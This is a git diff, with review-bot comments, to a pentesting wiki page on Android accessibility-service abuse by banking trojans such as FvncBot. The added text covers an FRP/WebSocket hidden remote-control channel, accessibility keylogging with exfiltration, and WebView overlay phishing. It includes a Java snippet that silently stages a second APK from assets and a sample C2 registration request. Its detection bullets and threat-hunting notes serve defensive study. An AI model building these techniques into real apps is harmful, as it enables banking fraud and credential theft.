diff --git a/src/mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md b/src/mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md
index e37e673a3e5..3e46b049d4a 100644
--- a/src/mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md
+++ b/src/mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md
@@ -53,6 +53,9 @@ The companion XML defines how the fake dialog will look like:
## Remote UI automation primitives
+
+Sample AccessibilityService automation
+
```java
public class EvilService extends AccessibilityService {
@Override
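Review bot: the new line `Sample AccessibilityService automation` before the fence is a bare label rather than a sentence, and it repeats what the `## Remote UI automation primitives` heading already says; either drop it or make it a lead-in sentence ending in a colon, e.g. `A minimal AccessibilityService exposing the two automation primitives discussed below:`, so it reads like the other code introductions on the page.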
@@ -74,6 +77,8 @@ public class EvilService extends AccessibilityService {
}
```
+
+
With only these two APIs an attacker can:
* Unlock the screen, open the banking app, navigate its UI tree and submit a transfer form.
* Accept every permission dialog that pops up.
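Review bot: the two added blank lines after the closing fence leave a double blank line before `With only these two APIs an attacker can:`; the rest of the file separates blocks with a single blank line, so keep just one here.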
@@ -103,7 +108,39 @@ The victim types credentials into the fake form while the background app receive
Malware families such as **PlayPraetor** maintain a persistent WebSocket channel where the operator can issue high-level commands (`init`, `update`, `alert_arr`, `report_list`, …). The service translates those commands into the low-level gestures above, achieving real-time unauthorized transactions that easily bypass multi-factor-authentication tied to that very device.
### 3. Screen streaming & monitoring
-By combining the **MediaProjection API** with an RTMP client library, the RAT can broadcast the live framebuffer to `rtmp://:1935/live/`, giving the adversary perfect situational awareness while the Accessibility engine drives the UI.
+By combining the **MediaProjection API** with an RTMP client library, the RAT can broadcast the live framebuffer to `rtmp://:1935/live/`, giving the adversary perfect situational awareness while the Accessibility engine drives the UI. Newer banking trojans additionally bootstrap a **Fast Reverse Proxy (FRP)** binary and upgrade it to a **WebSocket** stream when an `enable_ws` (or similar) push command arrives. That bi-directional socket carries high-frequency screenshots and synthetic gestures, effectively giving the operator an **HVNC session** that works even when the victim cannot notice anything on screen.
+
+### 4. Session-based multi-stage installers
+Android 13+ aggressively throttles background installs invoked through spoofed accessibility clicks. A common workaround is to **embed the second-stage APK under `assets/`** and side-load it with the **session-based `PackageInstaller` API** so the loader controls the whole UX while the origin of the payload remains opaque to the user:
+
+```java
+PackageInstaller pi = getPackageManager().getPackageInstaller();
+int id = pi.createSession(new SessionParams(SessionParams.MODE_FULL_INSTALL));
+try (Session s = pi.openSession(id);
+ InputStream in = getAssets().open("com.fvnc.app.apk");
+ OutputStream out = s.openWrite("base.apk", 0, -1)) {
+ in.transferTo(out);
+ s.commit(PendingIntent.getBroadcast(this, 0, new Intent(this, InstallReceiver.class), 0).getIntentSender());
+}
+```
+
+*Steps seen in the wild*
+1. Drop the payload unencrypted in `assets/`.
+2. Open a session, stream the bytes, commit and immediately deep-link the victim into the Accessibility settings so the second stage can be activated.
+3. Report installation status (success/failure) back to the loader C2 for infection tracking.
+
+The install dialog still appears, but everything else (UI strings, fake “security component” prompts, telemetry) is under attacker control.
+
+### 5. Accessibility keylogging buffers & real-time exfiltration
+Instead of hooking the keyboard, the RAT subscribes to `TYPE_VIEW_TEXT_CHANGED`, `TYPE_VIEW_FOCUSED`, `TYPE_WINDOW_STATE_CHANGED`, etc. Every event becomes a log record containing the focused app/activity, widget coordinates, and the actual text. Operators implement a **ring buffer** (e.g., 1 000 events) that is flushed over HTTP when full, while an active WebSocket tunnel streams the same events immediately to capture OTPs before they expire. Because everything happens inside the Accessibility service, no additional permissions are needed and foreground UI never shows a “keyboard” indicator.
+
+### 6. Web-inject overlays with WebView bridges
+Overlay phishing is no longer just a static HTML asset. Modern kits:
+* Keep a **configuration file in `SharedPreferences`** mapping package names → overlay template URLs, per-app locale strings, and capture requirements.
+* Inflate a full-screen `WebView` from the Accessibility service, load the remote phishing page, and register a `@JavascriptInterface` so JavaScript can post captured credentials/PINs/Card data straight back to native code.
+* Close the overlay OR launch the ATS automation module once the victim has typed everything, ensuring the real banking app underneath receives the same touches (so transfers happen in the legitimate UI session).
+
+This approach eliminates the Play Store “draw over other apps” dialog, gives operators on-the-fly phishing templates, and works across multiple banks without shipping new APKs.
---
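Review bot: the sentences added to section 3 (FRP binary, `enable_ws` push command, WebSocket upgrade, HVNC session) restate almost word for word the new `### Push-to-WebSocket escalation` section further down in this patch; keep the detailed description in one place and have the other refer to it with a one-line pointer, otherwise the two copies will drift. Two smaller points: `ATS` is used in section 6 (`launch the ATS automation module`) before it is expanded anywhere on the page, so spell it out on first use; and `*Steps seen in the wild*` is an italic label where the surrounding sections use `###` headings, so either promote it to a heading or fold the three steps into the paragraph above.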
@@ -125,6 +162,41 @@ The **AccessibilityService** is the local engine that turns those cloud commands
---
+## FvncBot-style loader & C2 fingerprints
+
+### Cleartext registration endpoints
+The FvncBot payload registers itself over plain HTTP (`naleymilva.it.com`) using static JSON structures, making the traffic trivial to fingerprint and replay in sandboxes.
+
+```http
+POST /api/v1/devices/register HTTP/1.1
+Host:
+Content-Type: application/json
+
+{
+ "device_id": "device_",
+ "fcm_token": "",
+ "device_info": { ... },
+ "optimization_stats": { ... }
+}
+```
+
+* `device_info` enumerates manufacturer, model, Android API level, app version, and screen size so operators can prioritise valuable hardware.
+* `optimization_stats` reports OEM power-management knobs (aggressiveness score, polling interval, foreground-service flag), allowing the C2 to decide when to wake modules or keep them dormant.
+* Campaign-specific values such as `build_id = "call_pl"` or `1.0-P` instantly reveal geo-targeting in passive network captures.
+
+### Push-to-WebSocket escalation
+Initial orchestration is done through **Firebase Cloud Messaging (FCM)**. When the bot receives the `enable_ws` (or equivalent) push command it launches an embedded **Fast Reverse Proxy (FRP)** client, pivots through the operator infrastructure, and upgrades the tunnel to a WebSocket session. That session multiplexes:
+* Low-latency screen streaming frames (better than periodic HTTP uploads).
+* Real-time forwarding of Accessibility keylogging events.
+* Synthetic gestures/keyboard events that provide an invisible **HVNC** channel over the victim’s legitimate banking session.
+
+The loader keeps reporting install/activation progress to the same telemetry host, so defenders can sinkhole the endpoint and immediately enumerate compromised builds.
+
+### Leveraging debug artefacts for hunting
+Even heavily obfuscated samples often keep developer log strings such as “WS connected”, “keylog buffer flushed”, etc. Analysts can patch the downloaded DEX modules to force the debug branches to execute and then observe deterministic markers in `logcat`. Threat hunters can monitor managed fleets for those strings or for suspicious FRP/`frpc` processes being spawned from non-system apps.
+
+---
+
## Detecting malicious accessibility services
* `adb shell settings get secure enabled_accessibility_services`
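Review bot: the HTTP sample leaves `Host:` empty although the prose two lines above names the host (`naleymilva.it.com`), and `"device_id": "device_"` and `"fcm_token": ""` are cut off without being marked as such; an empty `Host` header is not valid HTTP/1.1, so the fixture cannot be replayed in a sandbox or used to test a network signature as written. Fill `Host:` with the domain already given in the prose and replace the truncated values with an explicit placeholder such as `<redacted>`. Also, `1.0-P` in the `build_id` bullet is quoted without the JSON key it appears under; name the key so a hunter knows where to look in the body.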
@@ -134,6 +206,10 @@ The **AccessibilityService** is the local engine that turns those cloud commands
```bash
adb shell dumpsys accessibility | grep "Accessibility Service"
```
+* Network telemetry should flag **cleartext POSTs to `/api/v1/devices/register`** (often pointing to look-alike banking domains) when the JSON body contains both `device_info` and `optimization_stats` objects.
+* Monitor for user-installed apps invoking `PackageInstaller.Session` immediately after reading APK bytes from their own `assets/` directory—this is characteristic of staged loaders like the fake “mBank security key”.
+* EDR/MDM agents can alert when an app spawns binaries named `frp`/`frpc` or opens persistent WebSocket tunnels shortly after receiving an FCM push notification.
+* Collect `logcat` from quarantined devices and search for leftover developer strings such as “enable_ws”, “KeyloggerBufferSend”, or “WS reconnect”, which remain readable even when classes are otherwise obfuscated.
---
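Review bot: the `logcat` strings listed here (“enable_ws”, “KeyloggerBufferSend”, “WS reconnect”) do not match those given under `### Leveraging debug artefacts for hunting` in the same patch (“WS connected”, “keylog buffer flushed”), so a reader cannot tell which set was actually observed; merge them into one list and say whether they are verbatim from the sample or paraphrased. The `PackageInstaller.Session` bullet should also name the telemetry that can see an app reading its own `assets/` and then opening an install session, since neither the `enabled_accessibility_services` setting nor the `dumpsys accessibility` output above exposes that behaviour.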
@@ -149,6 +225,9 @@ The **AccessibilityService** is the local engine that turns those cloud commands
## ATS automation cheat-sheet (Accessibility-driven)
Malware can fully automate a bank app with only Accessibility APIs. Generic primitives:
+
+Common helper methods
+
```java
// Helpers inside your AccessibilityService
private List byText(String t){
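Review bot: `Common helper methods` is a bare label that duplicates the comment `// Helpers inside your AccessibilityService` on the first line of the block; drop it, or turn it into a sentence ending in a colon as the other code introductions on the page do.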
@@ -174,6 +253,8 @@ private void tap(float x, float y){
}
```
+
+
Example flow (Czech → English labels):
- "Nová platba" (New payment) → click
- "Zadat platbu" (Enter payment) → click
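Review bot: as after the `EvilService` block earlier in this patch, the two added blank lines produce a double blank line before `Example flow (Czech → English labels):`; a single blank line is enough.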
@@ -233,7 +314,7 @@ Observed flows for MetaMask, Trust Wallet, Blockchain.com and Phantom:
## NFC-relay orchestration
Accessibility/RAT modules can install and launch a dedicated NFC-relay app (e.g., NFSkate) as a third stage and even inject an overlay guide to shepherd the victim through card-present relay steps.
-Background and TTPs: https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay
+Background and TTPs: [GhostTap/NFSkate – NFC relay cash-out tactic (ThreatFabric)](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay)
---
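Review bot: the new link text is identical to the reference-list entry at the end of the file, so the same title now appears twice; that is acceptable for readability, but the sentence still has no terminal punctuation, so end it with a full stop after the closing parenthesis.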
@@ -242,5 +323,6 @@ Background and TTPs: https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-t
* [Android accessibility documentation – Automating UI interaction](https://developer.android.com/guide/topics/ui/accessibility/service)
* [The Rise of RatOn: From NFC heists to remote control and ATS (ThreatFabric)](https://www.threatfabric.com/blogs/the-rise-of-raton-from-nfc-heists-to-remote-control-and-ats)
* [GhostTap/NFSkate – NFC relay cash-out tactic (ThreatFabric)](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay)
+* [Intel 471 – New FvncBot Android banking trojan targets Poland](https://www.intel471.com/blog/new-fvncbot-android-banking-trojan-targets-poland)
{{#include ../../banners/hacktricks-training.md}}
\ No newline at end of file
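Review bot: the Intel 471 reference is added to the list, but the new `## FvncBot-style loader & C2 fingerprints` section and the detection bullets that draw on it (the registration endpoint, the `build_id` values, the “mBank security key” lure) do not cite it inline, unlike the NFC-relay section which links its ThreatFabric source in place; add an inline link where the FvncBot material is introduced so readers can check the indicators against the source. The file is also still left without a trailing newline (`\ No newline at end of file`); add one while touching the end of the file.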